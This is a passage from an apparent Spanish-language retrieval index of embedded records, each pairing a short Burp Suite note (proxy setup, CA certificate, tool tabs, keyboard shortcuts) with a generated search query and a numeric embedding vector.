-0.0114, -0.01009, -0.046, -0.03485, -0.03647, 0.09422, -0.09406, -0.05156, -0.08109, 0.00638, -0.00273, 0.11074, -0.01587, -0.01033, -0.0182, 0.05822, 0.03522, 0.00915, -0.03449, 0.04898, -0.10724, -0.01652, 0.04141, 0.01269, 0.01431, -0.0814, -0.05651, 0.05343, -0.06018, -0.0672, -0.04102, -0.1, 0.06176, 0.04273, -0.04362, 0.03447, -0.23417, -0.05257, -0.00937, -0.00455, -0.03943, -0.01896, -0.03822, 0.06163, 0.0343, -0.04218, 0.02141, -0.13418, -0.04491, -0.04454, 0.02638, 0.08726, -0.06613, 0.03628, -0.006, -0.00806, -0.01793, 0.10616, 0.00321, -0.00776, -0.00588, -0.0155, 0.06257, -0.15555, -0.0087, -0.02515, -0.09975, 0.04074, -0.03248, 0.06618, 0.08329, 0.01785, 0.08443, 0.08458, -0.09986, 0.15868, 0.05296, 0.09247, 0.01342, 0.14236, -0.03086, -0.17197, 0.14654, -0.07578, 0.10789, 0.05412, -0.04793, 0.00903, 0.03677, 0.05595, 0.01167, 0.01609, -0.078, -0.03163, -0.09392, -0.00358, -0.00575, 0.07634, -0.0173, -0.1211, -0.00357, -0.1011, 0.06373, -0.00177, 0.03528, 0.01225, 0.05899, 0.01532, 0.10875, -0.00785, -0.08362, 0.01365, -0.03232, -0.11701, -0.04957, 0.06612, -0.02221, -0.00584, -0.08489, 0.03427, 0.04864, -0.00427, 0.02089, 0.04496, 0.00807, 0.05852, -0.01087, -0.01904, 0.02454, -0.09252, 0.03368, -0.01901, 0.02903, -0.1015, -0.00663, -0.04392, -0.0372, -0.039, 0.04207, -0.04717, -0.00762, 0.01961, -0.02118, 0.03465, -0.02562, -0.06243, 0.02107, 0.12965, 0.12253, -0.02801, 0.09055, 0.02571, -0.12729, -0.02439, 0.05728, -0.03391, -0.05922, 0.07275, 0.00887, -0.01857, -0.01951, 0.01556, 0.00275, -0.06357, -0.03345, 0.00195, 0.01136, -0.03044, 0.06012, -0.01098, 0.01761, -0.03385, -0.01959, 0.00387, -0.0115, -0.0436, -0.01873, 0.04078, -0.05147, -0.01818, -0.03171, 0.00351, -0.01965, 0.0259, 0.061, -0.04759, -0.00326, 0.04795, 0.09079, 0.00339, -0.03755, 0.03253, 0.0314, -0.02588, -0.07115, 0.05465, -0.01555, -0.01362, 0.04532, 0.0133, 0.01378, 0.00771, 0.01979, 0.00854, -0.03436, 0.06723, -0.00399, 0.03657, 0.05543, -0.05231, -0.01389, -0.02164, -0.00443, 0.04393, 0.01301, 0.0072, -0.00886, -0.00249, -0.04827, 0.0057, 0.03107, -0.00874, -0.07585, 0.00477, -0.01611, -0.07406, -0.0112, 0.03868, 0.01811, -0.06892, 0.03213, 0.02135, -0.03228, 0.01936, 0.01287]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "con que puedo instalar un certificado CA desde una pΓ‘gina web en mi navegador", "v": [-0.00618, 0.08998, -0.13795, -0.16025, -0.02305, -0.18564, 0.03304, 0.05719, -0.07967, -0.10988, -0.1033, -0.10986, -0.13644, -0.06875, 0.02406, 0.07451, 0.09461, -0.08522, 0.13455, -0.00924, 0.01056, -0.0854, -0.02504, -0.02636, 0.02539, 0.06284, -0.02671, -0.00855, -0.07387, -0.08324, 0.02684, 0.04644, -0.00479, 0.10325, -0.05694, 0.02365, 0.03236, -0.01896, 0.01291, -0.05777, 0.02055, 0.01533, 0.0264, 0.09758, 0.00479, -0.01493, 0.03331, -0.16626, 0.00833, -0.06677, 0.00617, -0.09658, -0.14904, 0.00956, -0.13392, 0.03593, 0.16624, -0.07148, 0.13672, -0.09858, -0.05105, 0.06053, -0.07494, 0.12837, 0.01263, 0.03796, -0.00084, 0.08526, -0.04693, -0.0059, 0.02957, -0.01199, -0.00348, -0.05769, 0.00247, 0.03192, -0.01779, -0.01364, 0.14398, 0.00834, 0.15106, 0.0133, 0.01778, -0.05566, -0.11239, -0.02116, -0.07871, -0.01399, 0.13318, -0.07681, 0.06881, 0.03944, -0.00765, -0.0174, -0.0518, -0.15291, 0.08573, -0.01717, 0.01376, -0.0987, -0.0733, 0.09158, 0.01988, 0.07894, 0.04147, -0.05104, 0.03664, -0.03881, -0.00856, 0.03336, 0.04328, 0.02597, -0.13263, -0.10049, 0.00659, 0.08982, 0.00323, -0.04369, -0.05759, -0.07037, -0.07666, -0.05625, -0.14179, 0.02245, 0.02469, 0.09047, -0.04766, 0.02443, -0.03359, -0.02358, 0.00838, -0.10914, -0.02994, 0.02363, 0.01253, 0.04417, -0.05063, -0.0877, -0.01045, 0.04647, -0.00756, -0.03555, -0.01725, -0.00839, 0.09492, 0.00259, -0.1419, 0.00926, -0.10091, -0.09816, -0.06846, 0.03751, 0.01272, 0.0498, -0.0974, 0.01642, 0.03451, -0.02404, 0.06611, 0.04085, -0.00119, 0.03764, 0.07982, 0.03007, 0.00837, 0.07949, -0.16711, 0.02732, 0.07481, 0.07214, -0.01817, 0.08091, 0.00381, -0.09111, 0.07343, 0.00951, 0.02355, -0.00315, 0.04442, 0.03462, 0.0132, -0.01346, 0.01643, 0.00112, -0.04004, -0.06774, 0.02116, -0.0083, -0.02463, 0.02231, 0.03271, 0.02288, -0.09351, 0.03857, 0.0434, 0.01813, -0.05813, -0.04157, -0.00921, -0.06692, -0.0286, -0.03623, -0.01484, -0.02712, 0.0316, -0.00299, 0.06037, -0.05006, 0.00012, 0.03685, -0.01452, -0.034, 0.0297, -0.04292, -0.02038, 0.01349, 0.0529, -0.00726, -0.03076, -0.01377, 0.02107, -0.01951, 0.01367, 0.00747, 0.05311, -0.02546, 0.01779, -0.02918, -0.02213, 0.05774, -0.0039, -0.01834, -0.05976, -0.03065, 0.06031, -0.01318, 0.02041, -0.01132, -0.09943, 0.01083, -0.0249, 0.03101, 0.01752, -0.03865, -0.0051, -0.05219, -0.04962, -0.06049, -0.00272, -0.05656, -0.06555, 0.00314, 0.05308, -0.03308, -0.04133, 0.02558]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "existe alguna herramienta para abrir directamente el navegador del propio proxy", "v": [-0.0675, 0.09778, -0.22366, -0.14347, 0.01937, -0.08851, 0.06516, -0.02653, -0.07861, -0.16716, 0.00031, -0.04318, 0.00292, -0.10505, 0.04026, 0.03157, 0.10006, -0.06356, 0.03257, 0.00746, -0.06357, 0.02686, -0.10691, -0.06205, 0.01127, -0.07867, -0.00663, -0.04422, -0.1334, -0.04156, -0.07614, 0.00118, 0.09651, 0.00343, -0.0662, -0.02546, 0.11364, 0.03196, 0.06457, 0.0145, 0.07458, -0.06561, -0.06438, 0.1946, -0.01815, 0.00642, -0.08369, -0.06438, -0.05366, -0.00569, 0.00026, -0.23674, -0.18453, 0.04754, -0.02093, -0.04129, 0.12624, -0.17584, 0.04212, -0.08573, -0.04267, 0.00536, 0.03182, -0.05747, -0.03041, -0.09597, 0.00809, -0.01051, -0.12268, 0.08755, -0.05065, -0.05055, 0.03081, 0.05793, -0.02739, 0.01126, -0.02589, 0.03589, 0.09725, 0.09271, 0.10291, 0.01374, -0.00961, -0.0706, -0.08124, -0.11827, -0.00502, -0.01242, 0.11193, -0.09751, 0.04069, 0.16003, -0.03652, 0.03083, 0.01195, -0.10177, 0.01852, -0.07883, 0.00249, -0.04281, 0.12354, -0.04506, -0.02326, 0.06175, 0.01473, -0.01551, 0.01484, -0.09274, -0.04571, 0.06087, 0.08661, -0.03257, -0.00983, -0.03614, 0.07083, 0.0127, -0.07023, 0.00353, -0.02487, -0.10622, -0.04614, -0.04632, -0.15286, 0.01091, -0.06802, -0.05087, -0.07555, 0.07051, -0.01491, -0.04067, 0.01297, -0.11559, -0.0413, -0.01356, -0.04354, 0.00631, -0.01651, -0.11085, 0.0211, -0.10129, 0.01598, -0.03649, -0.05544, -0.09013, 0.03924, 0.00394, -0.04645, 0.0224, -0.04633, -0.08188, -0.0165, -0.05466, 0.00584, 0.03568, -0.03026, 0.0701, -0.06126, 0.02965, 0.03116, 0.04293, -0.05452, -0.03049, -0.0013, -0.0059, -0.04497, -0.02739, -0.03805, -0.01093, 0.1194, 0.04442, 0.03559, 0.07176, 0.0696, -0.0711, -0.02738, -0.00976, -0.06609, -0.03312, 0.01953, -0.06548, 0.07905, -0.04719, -0.00386, -0.06428, -0.08029, -0.05074, 0.03915, -0.0191, -0.08843, 0.06196, -0.02683, 0.00093, -0.03536, -0.01786, 0.07219, 0.00601, -0.0081, -0.06454, 0.03377, 0.00949, -0.0098, -0.03538, 0.02744, -0.05927, -0.01676, 0.02316, 0.02783, -0.05591, 0.02274, 0.02315, 0.02419, -0.02661, 0.01051, 0.02413, 0.04081, 0.00507, -0.00944, -0.00646, -0.03429, -0.01961, -0.04655, 0.00667, 0.04048, 0.00801, 0.06055, 0.04842, 0.00378, -0.0102, -0.00227, -0.0022, 0.02488, -0.04054, -0.02151, -0.00351, 0.01106, -0.03752, 0.06776, -0.0116, 0.02195, 0.0606, -0.01636, 0.03876, 0.05238, -0.05134, -0.04214, 0.00611, 0.01263, -0.02716, -0.03541, -0.05201, -0.04284, 0.00017, 0.00052, -0.03419, 0.00725, 0.01256]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "con que programa puedo capturar y modificar peticiones HTTP", "v": [0.11364, 0.1184, -0.11157, -0.16149, 0.08831, -0.06282, 0.04633, 0.08516, -0.024, -0.01022, -0.05016, 0.06829, 0.02552, -0.10524, 0.00915, 0.01986, 0.08967, -0.01583, 0.12373, 0.00173, 0.05738, -0.00758, 0.01371, -0.10792, -0.11207, -0.08329, 0.05706, 0.05391, -0.0769, -0.1385, 0.0338, -0.02478, -0.08771, 0.16066, -0.07573, -0.03912, -0.07325, 0.04604, -0.01491, 0.03716, 0.02797, 0.06019, -0.06744, -0.0016, -0.05357, -0.02994, 0.0223, -0.04756, -0.00833, -0.13931, 0.08171, 0.01167, -0.2049, -0.01112, -0.06935, 0.11947, 0.13784, -0.19866, -0.03808, -0.09377, 0.01122, -0.03699, 0.0299, -0.00085, 0.08372, -0.04298, -0.03906, 0.04867, -0.09156, 0.13037, 0.01346, 0.00212, 0.02768, -0.05246, 0.10658, 0.03695, -0.0648, -0.15434, -0.03158, -0.01462, -0.06964, -0.02862, -0.07602, 0.06248, -0.08826, 0.04992, -0.05002, -0.13622, 0.01806, -0.09265, 0.13016, 0.12667, 0.04531, 0.01947, 0.01886, -0.07541, 0.04264, 0.01602, -0.0056, 0.04012, -0.01638, -0.00579, -0.10153, 0.04015, 0.00242, 0.08757, 0.07724, -0.05197, 0.00241, 0.03955, -0.04454, 0.02989, -0.0354, 0.02642, 0.00143, -0.01535, -0.06569, -0.03922, 0.05473, -0.11662, -0.10073, -0.02621, -0.10145, -0.05506, 0.09264, 0.02987, -0.04553, 0.07853, 0.01818, -0.00565, 0.00581, 0.02172, -0.02567, -0.00949, -0.0749, -0.02717, 0.08224, -0.0586, 0.02037, -0.03727, -0.09521, 0.01374, 0.00708, -0.03389, 0.05981, 0.01312, 0.00426, -0.04233, -0.0433, 0.0053, 0.05332, 0.01482, -0.06138, 0.03425, -0.09174, 0.06945, 0.03212, -0.07996, -0.07576, 0.0804, 0.01666, 0.00998, 0.01201, -0.05378, 0.02005, -0.0154, -0.10274, 0.01736, 0.07051, 0.00098, -0.01513, 0.04457, -0.06767, -0.11166, -0.01937, -0.05228, -0.04799, -0.05125, 0.05876, -0.05346, -0.09109, 0.09314, 0.06012, 0.00629, 0.00126, -0.03651, 0.01616, 0.03791, 0.01346, 0.01839, 0.03661, 0.0294, -0.07227, 0.01801, 0.02438, -0.02509, -0.04459, 0.06835, 0.09136, 0.00426, -0.04028, -0.05049, 0.03908, -0.07403, 0.00379, 0.01468, -0.02585, 0.01891, -0.01054, 0.00214, -0.00602, -0.02264, 0.06746, -0.0451, 0.00215, -0.03743, 0.0457, 0.0631, -0.01238, 0.03281, -0.00807, 0.04712, 0.06301, 0.0796, 0.02349, -0.06618, 0.05782, 0.01245, -8e-05, 0.00036, -0.02906, -0.02073, -0.07455, -0.04107, 0.04886, 0.0603, -0.01938, -0.02805, -0.0618, -0.05458, 0.04596, 0.05311, -0.06237, -0.02253, 0.01996, -0.03857, -0.09713, 0.00845, 0.06587, -0.00537, -0.08133, 0.05107, 0.05737, -0.06237, 0.00378, 0.01356]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "que herramienta sirve para hacer fuerza bruta y automatizar payloads en un sitio web", "v": [0.08248, 0.0026, -0.27717, -0.14472, 0.0017, -0.02544, 0.04772, -0.07894, -0.07342, -0.04792, -0.08867, -0.04351, 0.03047, 0.12981, -0.0208, 0.00664, -0.01721, -0.12951, -0.09843, -0.01769, 0.02045, -0.04762, 0.00902, -0.0839, -0.10518, 0.0322, 0.03411, 0.04412, -0.32737, 0.09194, 0.01649, 0.14735, 0.13125, -0.03681, 0.01789, -0.04341, 0.02857, 0.10287, 0.04672, 0.05004, -0.07218, 0.13746, -0.12663, 0.0399, 0.02671, 0.10881, 0.00161, -0.02028, 0.035, 0.02831, -0.03093, -0.13451, -0.08719, -0.02242, -0.06037, -0.13601, 0.22119, -0.16674, -0.03707, -0.0167, -0.07898, 0.09271, -0.08547, -0.01651, -0.08849, 0.01398, 0.01335, -0.01119, -0.01549, -0.03484, -0.04007, -0.05203, 0.04069, -0.01597, 0.0046, -0.01567, -0.02186, 0.08504, -0.01285, 0.05057, 0.02886, 0.01139, -0.16009, 0.02106, -0.0728, -0.05961, 0.08242, -0.03248, 0.04182, -0.09697, 0.05179, 0.06257, -0.02425, 0.06108, -0.02018, -0.02182, 0.06164, -0.0578, 0.0407, -0.0574, 0.10378, -0.07642, -0.00818, -0.05508, 0.13764, 0.02521, 0.01739, -0.03162, -0.0186, 0.00451, 0.11352, -0.05276, -0.0294, 0.04794, -0.08082, 0.02794, -0.024, -0.01084, -0.00477, -0.06439, -0.02515, 0.03561, -0.03456, -0.00382, -0.04317, 0.00667, 0.0096, 0.11319, 0.02627, -0.11947, 0.02937, 0.01818, -0.02424, 0.00121, 0.04499, -0.04133, 0.08479, -0.08517, -0.01756, -0.06523, 0.02188, 0.06159, -0.00484, -0.06885, 0.06508, 0.01721, 0.02542, -0.02758, -0.07013, 0.00856, 0.03929, -0.01109, -0.00611, 0.02601, -0.0444, -0.02421, 0.03558, 0.00795, -0.06466, -0.00048, -0.02753, -0.01131, -0.02754, -0.01636, -0.00107, 0.03718, -0.07823, 0.02582, 0.01243, 0.04746, 0.02184, 0.00823, 0.05782, -0.00853, 0.01745, -0.03476, -0.06144, 0.03904, 0.02778, -0.02054, -0.04566, -0.01456, -0.01773, 0.02865, -0.00267, -0.01117, 0.06229, -0.06503, 0.01207, 0.05599, 0.00932, 0.03925, -0.06916, -0.03594, 0.03453, 0.00983, -0.07245, 0.02431, 0.0518, -0.02101, 0.0072, -0.07062, -0.00081, -0.03701, -0.0296, 0.06735, 0.04872, -0.05302, 0.01155, -0.01191, 0.03049, -0.02668, 0.05268, -0.10143, -0.04943, -0.05428, 0.00353, -0.01997, -0.02417, 0.02084, -0.00433, 0.01045, 0.00028, -0.01133, -0.00568, 0.07236, 0.09946, -0.02288, 0.03789, 0.0113, -0.02647, -0.01587, -0.02086, 0.00797, 0.01884, -0.03313, 0.02942, 0.00882, -0.12809, -0.00763, 0.00977, 0.0223, -0.02161, -0.07393, -0.03896, -0.06073, -0.01997, -0.0199, -0.028, -0.02947, -0.02727, 0.03281, 0.04329, 0.00488, 0.00283, 0.00474]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "cual es una alternativa libre a Burp Suite para interceptar y analizar trΓ‘fico", "v": [-0.03382, 0.03429, -0.11459, -0.19097, -0.0622, -0.06519, 0.05694, -0.01803, -0.10773, 0.04443, -0.02072, -0.14919, -0.01089, 0.12499, 0.09547, -0.06716, -0.09462, -0.03362, 0.12749, -0.01677, 0.09708, 0.07859, -0.04669, -0.08327, 0.00731, -0.10775, -0.15409, -0.01593, -0.04504, -0.02331, -0.07239, -0.00955, 0.14764, 0.03843, -0.03002, -0.1033, 0.03769, 0.0761, 0.07726, -0.09356, 0.06578, -0.06416, -0.10672, 0.03719, 0.04472, -0.08842, -0.15495, 0.04164, -0.03078, -0.05777, -0.01182, -0.01509, -0.08757, -0.03283, -0.00036, -0.0022, 0.0784, -0.0647, 0.04249, 0.01089, 0.03493, 0.09862, 0.02648, -0.08407, 0.03492, -0.06814, 0.00718, 0.00435, -0.09281, -0.03094, 0.02105, 0.0531, 0.01721, 0.12624, 0.01611, 0.00117, -0.07222, 0.08679, 0.08141, 0.05132, 0.09705, -0.02197, -0.12183, 0.15459, -0.04243, -0.04675, 0.07983, -0.15213, -0.04743, 0.10284, 0.04452, 0.04308, 0.03279, 0.06648, 0.04234, -0.04473, 0.00826, 0.0543, 0.00813, 0.05498, 0.13858, 0.0334, -0.17156, 0.02361, 0.02771, 0.05431, -0.07164, 0.02551, 0.01717, 0.05065, -0.1605, 0.04792, -0.01324, -0.0406, -0.03722, -0.11843, -0.03976, 0.01722, -0.02403, -0.06347, -0.06548, 0.01198, -0.0935, -0.11776, -0.02915, 0.01497, 0.00778, 0.04802, 0.08048, 0.00999, -0.01823, 0.01929, -0.11635, -0.07915, -0.08236, -0.05901, 0.01237, -0.07746, -0.02559, 0.00545, 0.02366, -0.03048, 0.02088, 0.01499, 0.04542, 0.03308, 0.02676, -0.07168, -0.02748, -0.05262, -0.01177, -0.07465, -0.07704, -0.00029, 0.04425, 0.05949, -0.05733, -0.0913, -0.04726, 0.02384, 0.01403, 0.00463, -0.04018, 0.04833, 0.10371, -0.07624, 0.01496, -0.00276, -0.00483, 0.00104, -0.02884, -0.00953, 0.03589, -0.10787, 0.0231, -0.0434, -0.01429, -0.08716, 0.01835, -0.09783, -0.01586, 0.02034, -0.06774, 0.01933, -0.03306, -0.00835, -0.03208, 0.06589, 0.03186, 0.03375, -0.01703, 0.06351, -0.03302, -0.06587, -0.04221, 0.00955, 0.02088, -0.07685, 0.04539, -0.01995, -0.02631, -0.06943, 0.00609, -0.03943, -0.06668, -0.05312, -0.01979, -0.00855, 0.02433, 0.07085, -0.00556, 0.02079, 0.07731, -0.04468, -0.04449, -0.02377, 0.00556, 0.02508, 0.03939, 0.03743, 0.00119, 0.07603, 0.01873, 0.00772, -0.0675, 0.05283, -0.0117, 0.05704, 0.03579, 0.04273, -0.0277, 0.02788, -0.02781, 0.07029, -0.01089, 0.01773, -0.03285, 0.01598, -0.05013, -0.04953, 0.13019, 0.03332, -0.08805, -0.03204, -0.01392, -0.02623, -0.07664, -0.00171, -0.00201, -0.06993, -0.01947, 0.06983, 0.02145, 0.00146, 0.07925, -0.04275]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "que atajo de teclado envΓ­o una peticiΓ³n a Repeater?", "v": [-0.09928, 0.09194, -0.17833, -0.17251, 0.0749, -0.09311, 0.05677, 0.15591, 0.08923, -0.05666, -0.10221, 0.03752, 0.02163, -0.12468, 0.14225, -0.05357, 0.02495, 0.11095, 0.25379, 0.00291, 0.03316, -0.01781, -0.09603, -0.00325, -0.03156, 0.09073, 0.03491, 0.04253, -0.01434, 0.03367, -0.03283, -0.09, -0.06438, -0.09141, 0.07113, -0.00099, 0.01158, 0.05607, -0.02339, 0.09559, -0.03192, -0.02539, -0.13826, 0.09193, -0.08422, 0.03758, 0.12991, 0.09765, -0.03335, 0.04923, -0.04346, -0.12041, -0.0715, -0.02596, -0.12192, 0.01144, 0.24623, -0.05312, 0.06153, -0.09405, 0.02909, 0.03801, 0.03411, 0.00915, -0.10363, -0.03417, 0.02204, -0.14014, 0.01808, 0.00219, -0.10626, -0.1264, -0.0614, 0.04906, 0.01638, 0.01971, -0.10203, -0.00343, 0.11713, 0.06684, 0.06315, -0.02242, -0.02572, -0.03233, 0.03917, 0.01052, -0.02355, -0.11355, -0.02057, 0.01625, -0.00173, -0.03919, 0.00761, -0.00419, 0.0199, -0.06493, -0.01815, -0.03178, -0.03193, -0.00219, 0.07039, 0.00908, 0.00421, -0.00901, 0.04329, -0.00998, -0.09619, -0.08449, 0.12297, 0.03413, 0.02439, -0.00443, 0.03351, 0.0425, -0.03813, -0.04553, -0.00275, -0.05514, -0.03409, -0.02812, -0.02361, -0.0544, -0.03331, -0.04242, -0.05253, 0.07108, -0.02977, 0.01681, 0.0487, -0.0276, 0.05978, -0.08327, -0.02756, -0.01895, 0.03342, 0.10199, -0.01782, -0.03322, 0.02822, 0.05927, 0.03467, 0.13341, 0.01318, -0.05124, -0.00324, 0.04592, 0.00322, -0.02483, -0.05565, -0.0554, 0.02464, 0.04398, 0.07655, -0.02308, -0.00678, -0.02161, 0.01493, 0.04581, -0.06463, 0.02452, -0.01333, 0.02508, -0.06306, 0.05624, -0.00149, 0.015, -0.05664, -0.04623, -0.03402, 0.02143, -0.07984, -0.00247, 0.03075, 0.04357, -0.03038, -0.00235, 0.04069, -0.00332, -0.01871, -0.00355, -0.08631, 0.18333, -0.02451, 0.04177, 0.04012, -0.05735, 0.01551, 0.02405, 0.03272, -0.02627, 0.05785, 0.0938, 0.04058, 0.03401, -0.03248, 0.04326, -0.12527, 0.00373, -0.05194, -0.00109, -0.01238, -0.0459, -0.05056, -0.08299, 0.00207, 0.03326, -0.11068, 0.00725, -0.0445, 0.01906, 0.03753, -0.02682, 0.04458, 0.02463, 0.02149, -0.06103, 0.04516, 0.01026, -0.00583, 0.00205, 0.07271, 0.05863, 0.04426, -0.02495, -0.00773, -0.02625, 0.03009, 0.04854, 0.05881, 0.01625, 0.02278, 0.04527, -0.03083, -0.07601, 0.00893, 0.01844, 0.03658, -0.01066, 0.00863, 0.01304, 0.00901, 0.00436, -0.06422, -0.05609, 0.00497, -0.02161, -0.08574, 0.01116, 0.04067, -0.01239, 0.00988, -0.00486, -0.00926, -0.12461, 0.00494, -0.04286]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "con que atajo puedo hacer base64 rΓ‘pido?", "v": [0.04372, 0.07452, -0.21808, -0.00413, -0.08064, -0.12388, -0.01485, -0.07235, -0.03759, -0.0794, 0.00027, 0.04565, -0.01029, -0.01707, -0.01596, 0.01602, -0.00352, -0.0078, -0.14364, -0.10986, -0.02847, -0.08516, -0.04234, -0.09151, 0.02664, 0.02433, -0.04062, -0.10667, -0.14028, -0.03138, 0.04132, -0.00302, -0.06831, 0.04848, -0.113, -0.06231, -0.08207, 0.0685, -0.04997, 0.02823, 0.01345, 0.0792, -0.17673, 0.20916, 0.00329, 0.02173, 0.03333, -0.02848, 0.08993, -0.09634, -0.00313, -0.16642, -0.15798, -0.08191, -0.12564, -0.17225, 0.07378, -0.06863, 0.00345, 0.00936, -0.00919, 0.01836, 0.0914, 0.00825, 0.00983, -0.00646, 0.06817, 0.05906, -0.04849, 0.03181, -0.12242, 0.1005, -0.11531, -0.00691, 0.0279, 0.05027, 0.04459, -0.03867, 0.03153, 0.10358, -0.06734, 0.06673, -0.01597, 0.00082, -0.03603, -0.02907, -0.01219, -0.08106, 0.01286, -0.07216, 0.16752, 9e-05, 0.01187, 0.02141, -0.0123, -0.02322, 0.02524, 0.02634, -0.01061, 0.0491, -0.04777, -0.10751, -0.02577, -0.05632, 0.07757, -0.02828, 0.12572, -0.06948, -0.08787, 0.03306, -0.06131, 0.13786, 0.00266, -0.01894, 0.06992, -0.04897, -0.08152, 0.04483, 0.03482, -0.02376, -0.01433, 0.02908, -0.01079, -0.04328, 0.07361, -0.00753, 0.01174, 0.01222, -0.02643, 0.00934, -0.0234, -0.0059, -0.02944, 0.04287, -0.06054, 0.14412, 0.00206, -0.0758, -0.03479, -0.10624, 0.09905, 0.02443, -0.0266, -0.00415, 0.11066, 0.10384, 0.09782, -0.02473, -0.12603, -0.02702, 0.06686, 0.00839, 0.02758, -0.01637, -0.05172, -0.04862, 0.07823, 0.01895, -0.00351, -0.00925, -0.04416, 0.06367, -0.01047, 0.05466, -0.06089, -0.04624, 0.02725, -0.08398, -0.06885, 0.03801, -0.0209, 0.10005, 0.00738, -0.04223, 0.00034, -0.03329, -0.07854, -0.02857, 0.01626, 0.01852, 0.01679, -0.01197, 0.0744, -0.00852, 0.00874, -0.03645, -0.03679, -0.00016, -0.00753, -0.00487, 0.03886, -0.05909, -0.05515, 0.00553, -0.0784, -0.01515, 0.00109, 0.02072, 0.00487, -0.06992, -0.01139, 0.0031, -0.06023, 0.00421, -0.02575, -0.03787, 0.05909, 0.00233, -0.0803, 0.10548, -0.03059, -0.0066, 0.02121, -0.0109, -0.03269, 0.03218, 0.05524, -0.04756, 0.00164, -0.05859, 0.07663, -0.00342, -0.03167, -0.01651, -0.00156, 0.08746, 0.01752, 0.00746, 0.0711, -0.01955, -0.09275, -0.00107, -0.07392, -0.02673, 0.00593, -0.05946, -0.05943, 0.03406, -0.02261, -0.01433, 0.07635, 0.00774, -0.05449, -0.01811, 0.00708, -0.02083, -0.07497, 0.03506, -0.0068, -0.05673, -0.02911, 0.05479, 0.11366, 0.0116, -0.04988, 0.02164]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "cΓ³mo envΓ­o la peticiΓ³n con el atajo de Intruder?", "v": [-0.20131, 0.1658, -0.17181, -0.04339, 0.11913, -0.00684, 0.07018, 0.07381, -0.03374, -0.06449, -0.0768, -0.02405, 0.14953, -0.1071, -0.074, -0.14101, 0.10122, 0.03344, 0.11113, 0.07127, 0.02525, 0.08481, -0.04755, -0.04098, -0.19859, 0.03582, 0.01218, 0.02072, -0.10149, 0.03559, -0.1161, -0.15169, -0.01444, 0.02326, 0.08624, -0.09485, 0.02823, 0.13946, -0.0972, 0.11237, -0.01233, 0.03275, -0.04539, -0.02923, -0.03322, -0.03211, 0.01813, 0.08779, -0.0085, 0.00864, -0.04733, -0.04808, -0.05353, -0.01764, -0.15954, 0.04321, 0.10134, 